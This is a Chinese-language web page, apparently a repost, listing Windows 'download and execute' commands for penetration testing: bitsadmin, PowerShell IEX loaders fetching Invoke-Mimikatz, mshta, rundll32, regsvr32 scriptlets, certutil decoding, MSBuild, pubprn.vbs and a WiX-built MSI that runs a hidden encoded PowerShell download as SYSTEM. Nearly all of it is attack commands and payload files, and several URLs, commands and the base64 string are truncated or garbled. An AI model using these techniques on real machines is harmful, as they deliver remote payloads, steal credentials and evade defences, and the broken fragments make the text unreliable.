windows下载执⾏命令⼤全
1.bitsadmin命令(只能命令下载到指定路径上,win7以上):
bitsadmin /transfer myDownLoadJob /download /priority normal "img5.cacheease/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg""d:\abc.jpg"
bitsadmin /transfer d90f site/a %APPDATA%\&%APPDATA%\&del %APPDATA%\
2.powershell命名下载执⾏:(win7以上)
powershell IEX (New-Object Net.WebClient).DownloadString('raw.githubusercontent/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz powershell -exec bypass -f \\webdavserver\folder\payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile( ‘192.168.168.’,’C:\111111*********.exe’)
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('img5.cacheease.c
om/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')
3.mshta命令下载执⾏
mshta vbscript:Close(Execute("GetObject(""script:webserver/payload.sct"")"))
mshta webserver/payload.hta --->短域名:sina.lt/-->mshta t/RYUQyF8
mshta \\webdavserver\folder\payload.hta
payload.hta
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Set objShell = CreateObject("Wscript.Shell")
objShell.Run ""
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
4.rundll32命令下载执⾏
rundll32 \\webdavserver\folder\payload.dll,entrypoint
< javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:webserver/payload.sct");window.close();
5中的regasm命令下载执⾏
C:\Windows\Microsoft.NET\Framework64\v4.0. /u \\webdavserver\folder\payload.dll
< /k < \\webdavserver\
regsvr32 /u /n /s /i:webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:site/js.png scrobj.dll
js.png
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = " /";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]
]>
</script>
</registration>
</scriptlet>
certutil -urlcache -split -f webserver/payload payload
certutil -urlcache -split -f webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f webserver/payload.b64 payload.b64 & certutil -decode payload. &
certutil -urlcache -split -f site/ && a.exe && && certutil -urlcache -split -f 192.168.254.102:80/a delete
9中的MSBulid命令下载执⾏
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0." & !MB! /noautoresponse /preprocess \\webdavserver\l > l & !MB! l"
10. odbcconf命令下载执⾏
odbcconf /s /a {regsvr \\webdavserver\folder\}
11.cscript脚本远程命令下载执⾏
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:raw.githubusercontent/3gstudent/test/master/downloadexec3.sct
cscript //E:jscript \\webdavserver\
downfile.vbs:
' Set your settings
strFileURL = "www.it1/images/it1_logo2.jpg"
strHDLocation = "c:\logo.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
将以上保存为downfile.vbs
输⼊命令:cscript downfile.vbs
12.pubprn.vbs下载执⾏命令
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:gist.githubusercontent/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct 13.windows⾃带命令copy
copy \\\
xcopy d:\ \\\
14. IEXPLORE.EXE命令下载执⾏(需要IE存在oday)
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" site/exp
15.IEEXC命令下载执⾏
C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec site/
16. msiexec命令下载执⾏
msiexec /q /i site/payloads/calc.png
该⽅法我之前的两篇⽂章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍,细节不再赘述
⾸先将powershell实现下载执⾏的代码作base64编码:
$fileContent = "(new-object System.Net.WebClient).DownloadFile('github/3gstudent/test/raw/','c:\');start-process 'c:\'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
$encoded = [System.Convert]::ToBase64String($bytes);
$encoded
得到:
KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4A 完整powershell命令为:
powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzA
完整wix⽂件为:
<?xml version="1.0"?>
<Wix xmlns="schemas.microsoft/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product
Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
html如何下载<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" />
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQ </Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR"
ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
invalid vbs to fail install
</CustomAction>
<InstallExecuteSequence>
<Custom Action="SystemShell" After="InstallInitialize"></Custom>
<Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>
将其编译,⽣成msi⽂件,命令如下:
< msigen.wix
< msigen.wixobj
⽣成test.msi
实现功能:
msiexec /q /i github/3gstudent/test/raw/master/test.msi
注:
执⾏后需要⼿动结束进程
msiexec /q /i dwz/6UJpF8
17.下载命令执⾏项⽬GreatSCT
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论